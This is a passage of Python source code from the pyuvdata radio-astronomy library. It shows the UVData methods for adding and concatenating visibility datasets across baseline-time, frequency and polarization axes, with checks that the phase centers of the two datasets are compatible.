use_ant_pos=False,
)
def __add__(
self,
other,
inplace=False,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
orig_phase_frame=None,
use_ant_pos=True,
verbose_history=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
make_multi_phase=False,
ignore_name=False,
):
"""
Combine two UVData objects along frequency, polarization and/or baseline-time.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
inplace : bool
If True, overwrite self as we go, otherwise create a third object
as the sum of the two.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). Note that if this keyword is not set
and the two UVData objects are phased to different phase centers
or if one is phased and one is drift, this method will error
because the objects are not compatible.
unphase_to_drift : bool
If True, unphase the objects to drift before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
verbose_history : bool
Option to allow more verbose history. If True and if the histories for the
two objects are different, the combined object will keep all the history of
both input objects (if many objects are combined in succession this can
lead to very long histories). If False and if the histories for the two
objects are different, the combined object will have the history of the
first object and only the parts of the second object history that are unique
(this is done word by word and can result in hard to interpret histories).
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. Setting this to true will allow for two
UVData objects to be combined, even if the phase center properties do not
agree (so long as the names are unique for each phase center). Default is
False.
ignore_name : bool
Option to ignore the name of the phase center (`cat_name` in
`phase_center_catalog` when `multi_phase_center=True`, otherwise
`object_name`) when combining two UVData objects. Doing so effectively
adopts the name found in the first UVData object in the sum. Default is
False.
Raises
------
ValueError
If other is not a UVData object, self and other are not compatible
or if data in self and other overlap. One way they can not be
compatible is if they have different phasing, in that case set
`unphase_to_drift` or `phase_center_radec` to (un)phase them so they
are compatible.
If `phase_center_radec` is not None and is not length 2.
"""
if inplace:
this = self
else:
this = self.copy()
# Check that both objects are UVData and valid
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not issubclass(other.__class__, this.__class__):
if not issubclass(this.__class__, other.__class__):
raise ValueError(
"Only UVData (or subclass) objects can be "
"added to a UVData (or subclass) object"
)
other.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
# Check to make sure that both objects are consistent w/ use of flex_spw
if this.flex_spw != other.flex_spw:
raise ValueError(
"To combine these data, flex_spw must be set to the same "
"value (True or False) for both objects."
)
# check that both objects have the same array shapes
if this.future_array_shapes != other.future_array_shapes:
raise ValueError(
"Both objects must have the same `future_array_shapes` parameter. "
"Use the `use_future_array_shapes` or `use_current_array_shapes` "
"methods to convert them."
)
if phase_center_radec is not None and unphase_to_drift:
raise ValueError(
"phase_center_radec cannot be set if unphase_to_drift is True."
)
if unphase_to_drift:
if this.phase_type != "drift":
warnings.warn("Unphasing this UVData object to drift")
this.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
if other.phase_type != "drift":
warnings.warn("Unphasing other UVData object to drift")
other.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
if phase_center_radec is not None:
if np.array(phase_center_radec).size != 2:
raise ValueError("phase_center_radec should have length 2.")
# If this object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if this.phase_type == "drift" or (
not np.isclose(
this.phase_center_ra,
phase_center_radec[0],
rtol=this._phase_center_ra.tols[0],
atol=this._phase_center_ra.tols[1],
)
or not np.isclose(
this.phase_center_dec,
phase_center_radec[1],
rtol=this._phase_center_dec.tols[0],
atol=this._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing this UVData object to phase_center_radec")
this.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
# If other object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if other.phase_type == "drift" or (
not np.isclose(
other.phase_center_ra,
phase_center_radec[0],
rtol=other._phase_center_ra.tols[0],
atol=other._phase_center_ra.tols[1],
)
or not np.isclose(
other.phase_center_dec,
phase_center_radec[1],
rtol=other._phase_center_dec.tols[0],
atol=other._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing other UVData object to phase_center_radec")
other.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
# Define parameters that must be the same to add objects
# But phase_center should be the same, even if in drift (empty parameters)
compatibility_params = [
"_vis_units",
"_telescope_name",
"_instrument",
"_telescope_location",
"_phase_type",
"_Nants_telescope",
"_antenna_names",
"_antenna_numbers",
"_antenna_positions",
"_phase_center_frame",
"_phase_center_epoch",
]
if not this.future_array_shapes and not this.flex_spw:
compatibility_params.append("_channel_width")
multi_obj_check = False
if this.multi_phase_center == other.multi_phase_center:
# If the names are different and we are making a mutli-phase-ctr data set,
# then we can skip the step of checking the ra and dec, otherwise we need to
# check it
multi_obj_check = make_multi_phase or this.multi_phase_center
if not ((this.object_name != other.object_name) and multi_obj_check):
compatibility_params.append("_phase_center_ra")
compatibility_params.append("_phase_center_dec")
# Also, if we are not supposed to ignore the name, then make sure that its
# one of the parameters we check for compatibility.
if not (ignore_name or multi_obj_check):
compatibility_params.append("_object_name")
elif not (this.multi_phase_center or make_multi_phase):
raise ValueError(
"To combine these data, please run the add operation with the UVData "
"object with multi_phase_center set to True as the first object in the "
"add operation."
)
# Build up history string
history_update_string = " Combined data along "
n_axes = 0
# Create blt arrays for convenience
prec_t = -2 * np.floor(np.log10(this._time_array.tols[-1])).astype(int)
prec_b = 8
this_blts = np.array(
[
"_".join(
["{1:.{0}f}".format(prec_t, blt[0]), str(blt[1]).zfill(prec_b)]
)
for blt in zip(this.time_array, this.baseline_array)
]
)
other_blts = np.array(
[
"_".join(
["{1:.{0}f}".format(prec_t, blt[0]), str(blt[1]).zfill(prec_b)]
)
for blt in zip(other.time_array, other.baseline_array)
]
)
# Check we don't have overlapping data
both_pol, this_pol_ind, other_pol_ind = np.intersect1d(
this.polarization_array, other.polarization_array, return_indices=True
)
# If we have a flexible spectral window, the handling here becomes a bit funky,
# because we are allowed to have channels with the same frequency *if* they
# belong to different spectral windows (one real-life example: you might want
# to preserve guard bands in the correlator, which can have overlaping RF
# frequency channels)
if this.flex_spw:
this_freq_ind = np.array([], dtype=np.int64)
other_freq_ind = np.array([], dtype=np.int64)
both_freq = np.array([], dtype=float)
both_spw = np.intersect1d(this.spw_array, other.spw_array)
for idx in both_spw:
this_mask = np.where(this.flex_spw_id_array == idx)[0]
other_mask = np.where(other.flex_spw_id_array == idx)[0]
if this.future_array_shapes:
both_spw_freq, this_spw_ind, other_spw_ind = np.intersect1d(
this.freq_array[this_mask],
other.freq_array[other_mask],
return_indices=True,
)
else:
both_spw_freq, this_spw_ind, other_spw_ind = np.intersect1d(
this.freq_array[0, this_mask],
other.freq_array[0, other_mask],
return_indices=True,
)
this_freq_ind = np.append(this_freq_ind, this_mask[this_spw_ind])
other_freq_ind = np.append(other_freq_ind, other_mask[other_spw_ind])
both_freq = np.append(both_freq, both_spw_freq)
else:
if this.future_array_shapes:
both_freq, this_freq_ind, other_freq_ind = np.intersect1d(
this.freq_array, other.freq_array, return_indices=True
)
else:
both_freq, this_freq_ind, other_freq_ind = np.intersect1d(
this.freq_array[0, :], other.freq_array[0, :], return_indices=True
)
both_blts, this_blts_ind, other_blts_ind = np.intersect1d(
this_blts, other_blts, return_indices=True
)
if not self.metadata_only and (
len(both_pol) > 0 and len(both_freq) > 0 and len(both_blts) > 0
):
# check that overlapping data is not valid
if this.future_array_shapes:
this_inds = np.ravel_multi_index(
(
this_blts_ind[:, np.newaxis, np.newaxis],
this_freq_ind[np.newaxis, :, np.newaxis],
this_pol_ind[np.newaxis, np.newaxis, :],
),
this.data_array.shape,
).flatten()
other_inds = np.ravel_multi_index(
(
other_blts_ind[:, np.newaxis, np.newaxis],
other_freq_ind[np.newaxis, :, np.newaxis],
other_pol_ind[np.newaxis, np.newaxis, :],
),
other.data_array.shape,
).flatten()
else:
this_inds = np.ravel_multi_index(
(
this_blts_ind[:, np.newaxis, np.newaxis, np.newaxis],
np.zeros((1, 1, 1, 1), dtype=np.int64),
this_freq_ind[np.newaxis, np.newaxis, :, np.newaxis],
this_pol_ind[np.newaxis, np.newaxis, np.newaxis, :],
),
this.data_array.shape,
).flatten()
other_inds = np.ravel_multi_index(
(
other_blts_ind[:, np.newaxis, np.newaxis, np.newaxis],
np.zeros((1, 1, 1, 1), dtype=np.int64),
other_freq_ind[np.newaxis, np.newaxis, :, np.newaxis],
other_pol_ind[np.newaxis, np.newaxis, np.newaxis, :],
),
other.data_array.shape,
).flatten()
this_all_zero = np.all(this.data_array.flatten()[this_inds] == 0)
this_all_flag = np.all(this.flag_array.flatten()[this_inds])
other_all_zero = np.all(other.data_array.flatten()[other_inds] == 0)
other_all_flag = np.all(other.flag_array.flatten()[other_inds])
if this_all_zero and this_all_flag:
# we're fine to overwrite; update history accordingly
history_update_string = " Overwrote invalid data using pyuvdata."
this.history += history_update_string
elif other_all_zero and other_all_flag:
raise ValueError(
"To combine these data, please run the add operation again, "
"but with the object whose data is to be overwritten as the "
"first object in the add operation."
)
else:
raise ValueError(
"These objects have overlapping data and cannot be combined."
)
# find the blt indices in "other" but not in "this"
temp = np.nonzero(~np.in1d(other_blts, this_blts))[0]
if len(temp) > 0:
bnew_inds = temp
new_blts = other_blts[temp]
history_update_string += "baseline-time"
n_axes += 1
else:
bnew_inds, new_blts = ([], [])
# if there's any overlap in blts, check extra params
temp = np.nonzero(np.in1d(other_blts, this_blts))[0]
if len(temp) > 0:
# add metadata to be checked to compatibility params
extra_params = [
"_integration_time",
"_uvw_array",
"_lst_array",
"_phase_center_app_ra",
"_phase_center_app_dec",
"_phase_center_frame_pa",
"_phase_center_id_array",
"_phase_center_catalog",
"_Nphase",
]
compatibility_params.extend(extra_params)
if not ignore_name and ("_object_name" not in compatibility_params):
compatibility_params.append("_object_name")
# TODO: Add handling for what happens when you have two different source
# catalogs that you want to combine
# find the freq indices in "other" but not in "this"
if self.flex_spw:
other_mask = np.ones_like(other.flex_spw_id_array, dtype=bool)
for idx in np.intersect1d(this.spw_array, other.spw_array):
if this.future_array_shapes:
other_mask[other.flex_spw_id_array == idx] = np.isin(
other.freq_array[other.flex_spw_id_array == idx],
this.freq_array[this.flex_spw_id_array == idx],
invert=True,
)
else:
other_mask[other.flex_spw_id_array == idx] = np.isin(
other.freq_array[0, other.flex_spw_id_array == idx],
this.freq_array[0, this.flex_spw_id_array == idx],
invert=True,
)
temp = np.where(other_mask)[0]
else:
if this.future_array_shapes:
temp = np.nonzero(~np.in1d(other.freq_array, this.freq_array))[0]
else:
temp = np.nonzero(
~np.in1d(other.freq_array[0, :], this.freq_array[0, :])
)[0]
if len(temp) > 0:
fnew_inds = temp
if n_axes > 0:
history_update_string += ", frequency"
else:
history_update_string += "frequency"
n_axes += 1
else:
fnew_inds = []
# if channel width is an array and there's any overlap in freqs,
# check extra params
if this.future_array_shapes or this.flex_spw:
if this.future_array_shapes:
temp = np.nonzero(np.in1d(other.freq_array, this.freq_array))[0]
else:
temp = np.nonzero(
np.in1d(other.freq_array[0, :], this.freq_array[0, :])
)[0]
if len(temp) > 0:
# add metadata to be checked to compatibility params
extra_params = ["_channel_width"]
compatibility_params.extend(extra_params)
# find the pol indices in "other" but not in "this"
temp = np.nonzero(~np.in1d(other.polarization_array, this.polarization_array))[
0
]
if len(temp) > 0:
pnew_inds = temp
if n_axes > 0:
history_update_string += ", polarization"
else:
history_update_string += "polarization"
n_axes += 1
else:
pnew_inds = []
# Actually check compatibility parameters
for cp in compatibility_params:
if cp == "_integration_time":
# only check that overlapping blt indices match
params_match = np.allclose(
this.integration_time[this_blts_ind],
other.integration_time[other_blts_ind],
rtol=this._integration_time.tols[0],
atol=this._integration_time.tols[1],
)
elif cp == "_uvw_array":
# only check that overlapping blt indices match
params_match = np.allclose(
this.uvw_array[this_blts_ind, :],
other.uvw_array[other_blts_ind, :],
rtol=this._uvw_array.tols[0],
atol=this._uvw_array.tols[1],
)
elif cp == "_lst_array":
# only check that overlapping blt indices match
params_match = np.allclose(
this.lst_array[this_blts_ind],
other.lst_array[other_blts_ind],
rtol=this._lst_array.tols[0],
atol=this._lst_array.tols[1],
)
elif cp == "_channel_width" and this.future_array_shapes or this.flex_spw:
# only check that overlapping freq indices match
params_match = np.allclose(
this.channel_width[this_freq_ind],
other.channel_width[other_freq_ind],
rtol=this._channel_width.tols[0],
atol=this._channel_width.tols[1],
)
elif (cp == "_phase_center_app_ra") and (this.phase_type == "phased"):
# only check that overlapping blt indices match
params_match = np.allclose(
this.phase_center_app_ra[this_blts_ind],
other.phase_center_app_ra[other_blts_ind],
rtol=this._phase_center_app_ra.tols[0],
atol=this._phase_center_app_ra.tols[1],
)
elif (cp == "_phase_center_app_dec") and (this.phase_type == "phased"):
# only check that overlapping blt indices match
params_match = np.allclose(
this.phase_center_app_dec[this_blts_ind],
other.phase_center_app_dec[other_blts_ind],
rtol=this._phase_center_app_dec.tols[0],
atol=this._phase_center_app_dec.tols[1],
)
elif (cp == "_phase_center_frame_pa") and (this.phase_type == "phased"):
# only check that overlapping blt indices match
params_match = np.allclose(
this.phase_center_frame_pa[this_blts_ind],
other.phase_center_frame_pa[other_blts_ind],
rtol=this._phase_center_frame_pa.tols[0],
atol=this._phase_center_frame_pa.tols[1],
)
else:
params_match = getattr(this, cp) == getattr(other, cp)
if not params_match:
msg = (
"UVParameter " + cp[1:] + " does not match. Cannot combine objects."
)
if cp[1:] == "object_name":
msg += (
" This can potentially be remedied by setting "
"ignore_name=True, or by allowing the creation of a "
"mutli-phase-ctr dataset (by setting make_multi_phase=True)."
)
raise ValueError(msg)
# At this point, we are assuming that the two data sets _mostly_ compatible.
# Last thing we need to check is if these are mutli-phase-ctr data sets, whether
# or not they are compatible.
if this.multi_phase_center or make_multi_phase:
if other.multi_phase_center:
other_names = list(other.phase_center_catalog.keys())
other_cat = other.phase_center_catalog
else:
other_names = [other.object_name]
other_cat = {
other_names[0]: {
"cat_type": "sidereal",
"cat_lon": other.phase_center_ra,
"cat_lat": other.phase_center_dec,
"cat_frame": other.phase_center_frame,
"cat_epoch": other.phase_center_epoch,
},
}
for name in other_names:
cat_id, cat_diffs = this._look_in_catalog(
name, phase_dict=other_cat[name]
)
if (cat_id is not None) and (cat_diffs != 0):
# We have a name conflict, raise an error now
raise ValueError(
"There exists a target named %s in both objects in the "
"sum, but their properties are different. Use the rename_"
"phase_center method in order to rename it in one object."
% name
)
# Begin manipulating the objects.
if make_multi_phase and (not this.multi_phase_center):
this._set_multi_phase_center(preserve_phase_center_info=True)
if other.multi_phase_center:
# This to get adding stuff to the catalog
reserved_ids = [
other.phase_center_catalog[name]["cat_id"]
for name in other.phase_center_catalog.keys()
]
# First loop, we want to look at the sources that are in this, but not
# other, since we need to choose catalog IDs that won't collide with the
# catalog that exists.
for name in this.phase_center_catalog.keys():
if name not in other.phase_center_catalog.keys():
this._update_phase_center_id(name, reserved_ids=reserved_ids)
# Next loop, we want to update the IDs of sources that are in both
for name in this.phase_center_catalog.keys():
if name in other.phase_center_catalog.keys():
this._update_phase_center_id(
name, new_cat_id=other.phase_center_catalog[name]["cat_id"],
)
# Finally, add those other objects not found in this
for name in other.phase_center_catalog.keys():
if name not in this.phase_center_catalog.keys():
this._add_phase_center(
name,
cat_type=other.phase_center_catalog[name]["cat_type"],
cat_lon=other.phase_center_catalog[name]["cat_lon"],
cat_lat=other.phase_center_catalog[name]["cat_lat"],
cat_frame=other.phase_center_catalog[name]["cat_frame"],
cat_epoch=other.phase_center_catalog[name]["cat_epoch"],
cat_times=other.phase_center_catalog[name]["cat_times"],
cat_pm_ra=other.phase_center_catalog[name]["cat_pm_ra"],
cat_pm_dec=other.phase_center_catalog[name]["cat_pm_dec"],
cat_dist=other.phase_center_catalog[name]["cat_dist"],
cat_vrad=other.phase_center_catalog[name]["cat_vrad"],
info_source=other.phase_center_catalog[name]["info_source"],
cat_id=other.phase_center_catalog[name]["cat_id"],
)
elif this.multi_phase_center:
# If other is not multi phase center, then we'll go ahead and add the object
# information here.
other_cat_id = this._add_phase_center(
other.object_name,
cat_type="sidereal",
cat_lon=other.phase_center_ra,
cat_lat=other.phase_center_dec,
cat_frame=other.phase_center_frame,
cat_epoch=other.phase_center_epoch,
)
# Pad out self to accommodate new data
if len(bnew_inds) > 0:
this_blts = np.concatenate((this_blts, new_blts))
blt_order = np.argsort(this_blts)
if not self.metadata_only:
if this.future_array_shapes:
zero_pad = np.zeros((len(bnew_inds), this.Nfreqs, this.Npols))
else:
zero_pad = np.zeros((len(bnew_inds), 1, this.Nfreqs, this.Npols))
this.data_array = np.concatenate([this.data_array, zero_pad], axis=0)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=0
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=0
).astype(np.bool_)
this.uvw_array = np.concatenate(
[this.uvw_array, other.uvw_array[bnew_inds, :]], axis=0
)[blt_order, :]
this.time_array = np.concatenate(
[this.time_array, other.time_array[bnew_inds]]
)[blt_order]
this.integration_time = np.concatenate(
[this.integration_time, other.integration_time[bnew_inds]]
)[blt_order]
this.lst_array = np.concatenate(
[this.lst_array, other.lst_array[bnew_inds]]
)[blt_order]
this.ant_1_array = np.concatenate(
[this.ant_1_array, other.ant_1_array[bnew_inds]]
)[blt_order]
this.ant_2_array = np.concatenate(
[this.ant_2_array, other.ant_2_array[bnew_inds]]
)[blt_order]
this.baseline_array = np.concatenate(
[this.baseline_array, other.baseline_array[bnew_inds]]
)[blt_order]
if this.phase_type == "phased":
this.phase_center_app_ra = np.concatenate(
[this.phase_center_app_ra, other.phase_center_app_ra[bnew_inds]]
)[blt_order]
this.phase_center_app_dec = np.concatenate(
[this.phase_center_app_dec, other.phase_center_app_dec[bnew_inds]]
)[blt_order]
this.phase_center_frame_pa = np.concatenate(
[this.phase_center_frame_pa, other.phase_center_frame_pa[bnew_inds]]
)[blt_order]
if this.multi_phase_center:
if other.multi_phase_center:
this.phase_center_id_array = np.concatenate(
[
this.phase_center_id_array,
other.phase_center_id_array[bnew_inds],
]
)[blt_order]
else:
this.phase_center_id_array = np.concatenate(
[this.phase_center_id_array, [other_cat_id] * len(bnew_inds)]
)[blt_order]
if len(fnew_inds) > 0:
if this.future_array_shapes:
this.freq_array = np.concatenate(
[this.freq_array, other.freq_array[fnew_inds]]
)
else:
this.freq_array = np.concatenate(
[this.freq_array, other.freq_array[:, fnew_inds]], axis=1
)
if this.flex_spw or this.future_array_shapes:
this.channel_width = np.concatenate(
[this.channel_width, other.channel_width[fnew_inds]]
)
if this.flex_spw:
this.flex_spw_id_array = np.concatenate(
[this.flex_spw_id_array, other.flex_spw_id_array[fnew_inds]]
)
this.spw_array = np.concatenate([this.spw_array, other.spw_array])
# We want to preserve per-spw information based on first appearance
# in the concatenated array.
unique_index = np.sort(
np.unique(this.flex_spw_id_array, return_index=True)[1]
)
this.spw_array = this.flex_spw_id_array[unique_index]
this.Nspws = len(this.spw_array)
# If we have a flex/multi-spw data set, need to sort out the order of the
# individual windows first.
if this.flex_spw:
f_order = np.concatenate(
[
np.where(this.flex_spw_id_array == idx)[0]
for idx in sorted(this.spw_array)
]
)
# With spectral windows sorted, check and see if channels within
# windows need sorting. If they are ordered in ascending or descending
# fashion, leave them be. If not, sort in ascending order
for idx in this.spw_array:
select_mask = this.flex_spw_id_array[f_order] == idx
check_freqs = (
this.freq_array[f_order[select_mask]]
if this.future_array_shapes
else this.freq_array[0, f_order[select_mask]]
)
if (not np.all(check_freqs[1:] > check_freqs[:-1])) and (
not np.all(check_freqs[1:] < check_freqs[:-1])
):
subsort_order = f_order[select_mask]
f_order[select_mask] = subsort_order[np.argsort(check_freqs)]
else:
if this.future_array_shapes:
f_order = np.argsort(this.freq_array)
else:
f_order = np.argsort(this.freq_array[0, :])
if not self.metadata_only:
if this.future_array_shapes:
zero_pad = np.zeros(
(this.data_array.shape[0], len(fnew_inds), this.Npols)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=1
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=1
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=1
).astype(np.bool_)
else:
zero_pad = np.zeros(
(this.data_array.shape[0], 1, len(fnew_inds), this.Npols)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=2
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=2
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=2
).astype(np.bool_)
if len(pnew_inds) > 0:
this.polarization_array = np.concatenate(
[this.polarization_array, other.polarization_array[pnew_inds]]
)
p_order = np.argsort(np.abs(this.polarization_array))
if not self.metadata_only:
if this.future_array_shapes:
zero_pad = np.zeros(
(
this.data_array.shape[0],
this.data_array.shape[1],
len(pnew_inds),
)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=2
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=2
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=2
).astype(np.bool_)
else:
zero_pad = np.zeros(
(
this.data_array.shape[0],
1,
this.data_array.shape[2],
len(pnew_inds),
)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=3
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=3
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=3
).astype(np.bool_)
# Now populate the data
pol_t2o = np.nonzero(
np.in1d(this.polarization_array, other.polarization_array)
)[0]
if this.future_array_shapes:
freq_t2o = np.nonzero(np.in1d(this.freq_array, other.freq_array))[0]
else:
freq_t2o = np.nonzero(
np.in1d(this.freq_array[0, :], other.freq_array[0, :])
)[0]
blt_t2o = np.nonzero(np.in1d(this_blts, other_blts))[0]
if not self.metadata_only:
if this.future_array_shapes:
this.data_array[np.ix_(blt_t2o, freq_t2o, pol_t2o)] = other.data_array
this.nsample_array[
np.ix_(blt_t2o, freq_t2o, pol_t2o)
] = other.nsample_array
this.flag_array[np.ix_(blt_t2o, freq_t2o, pol_t2o)] = other.flag_array
else:
this.data_array[
np.ix_(blt_t2o, [0], freq_t2o, pol_t2o)
] = other.data_array
this.nsample_array[
np.ix_(blt_t2o, [0], freq_t2o, pol_t2o)
] = other.nsample_array
this.flag_array[
np.ix_(blt_t2o, [0], freq_t2o, pol_t2o)
] = other.flag_array
if not self.metadata_only:
if this.future_array_shapes:
if len(bnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[blt_order, :, :])
if len(fnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, f_order, :])
if len(pnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, :, p_order])
else:
if len(bnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[blt_order, :, :, :])
if len(fnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, :, f_order, :])
if len(pnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, :, :, p_order])
if len(fnew_inds) > 0:
if this.future_array_shapes:
this.freq_array = this.freq_array[f_order]
else:
this.freq_array = this.freq_array[:, f_order]
if this.flex_spw or this.future_array_shapes:
this.channel_width = this.channel_width[f_order]
if this.flex_spw:
this.flex_spw_id_array = this.flex_spw_id_array[f_order]
if len(pnew_inds) > 0:
this.polarization_array = this.polarization_array[p_order]
# Update N parameters (e.g. Npols)
this.Ntimes = len(np.unique(this.time_array))
this.Nbls = len(np.unique(this.baseline_array))
this.Nblts = this.uvw_array.shape[0]
this.Nfreqs = this.freq_array.size
this.Npols = this.polarization_array.shape[0]
this.Nants_data = this._calc_nants_data()
# Update filename parameter
this.filename = uvutils._combine_filenames(this.filename, other.filename)
if this.filename is not None:
this._filename.form = (len(this.filename),)
# Check specific requirements
if this.Nfreqs > 1:
spacing_error, chanwidth_error = this._check_freq_spacing(
raise_errors=False
)
if spacing_error:
warnings.warn(
"Combined frequencies are not evenly spaced or have differing "
"values of channel widths. This will make it impossible to write "
"this data out to some file types."
)
elif chanwidth_error:
warnings.warn(
"Combined frequencies are separated by more than their "
"channel width. This will make it impossible to write this data "
"out to some file types."
)
if n_axes > 0:
history_update_string += " axis using pyuvdata."
histories_match = uvutils._check_histories(this.history, other.history)
this.history += history_update_string
if not histories_match:
if verbose_history:
this.history += " Next object history follows. " + other.history
else:
extra_history = uvutils._combine_history_addition(
this.history, other.history
)
if extra_history is not None:
this.history += (
" Unique part of next object history follows. "
+ extra_history
)
# Check final object is self-consistent
if run_check:
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return this
def __iadd__(
self,
other,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
orig_phase_frame=None,
use_ant_pos=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
make_multi_phase=False,
ignore_name=False,
):
"""
In place add.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). Note that if this keyword is not set
and the two UVData objects are phased to different phase centers
or if one is phased and one is drift, this method will error
because the objects are not compatible.
unphase_to_drift : bool
If True, unphase the objects to drift before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. Setting this to true will allow for two
UVData objects to be combined, even if the phase center properties do not
agree (so long as the names are unique for each phase center). Default is
False.
ignore_name : bool
Option to ignore the name of the phase center (`cat_name` in
`phase_center_catalog` when `multi_phase_center=True`, otherwise
`object_name`) when combining two UVData objects. Doing so effectively
adopts the name found in the first UVData object in the sum. Default is
False.
Raises
------
ValueError
If other is not a UVData object, self and other are not compatible
or if data in self and other overlap. One way they can not be
compatible is if they have different phasing, in that case set
`unphase_to_drift` or `phase_center_radec` to (un)phase them so they
are compatible.
If `phase_center_radec` is not None and is not length 2.
"""
self.__add__(
other,
inplace=True,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
make_multi_phase=make_multi_phase,
ignore_name=ignore_name,
)
return self
def fast_concat(
self,
other,
axis,
inplace=False,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
orig_phase_frame=None,
use_ant_pos=True,
verbose_history=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
ignore_name=False,
):
"""
Concatenate two UVData objects along specified axis with almost no checking.
Warning! This method assumes all the metadata along other axes is sorted
the same way. The __add__ method is much safer, it checks all the metadata,
but it is slower. Some quick checks are run, but this method doesn't
make any guarantees that the resulting object is correct.
Parameters
----------
other : UVData object or list of UVData objects
UVData object or list of UVData objects which will be added to self.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. Allowed values are: 'blt', 'freq', 'polarization'.
inplace : bool
If True, overwrite self as we go, otherwise create a third object
as the sum of the two.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). Note that if this keyword is not set
and the two UVData objects are phased to different phase centers
or if one is phased and one is drift, this method will error
because the objects are not compatible.
unphase_to_drift : bool
If True, unphase the objects to drift before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & abberation.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
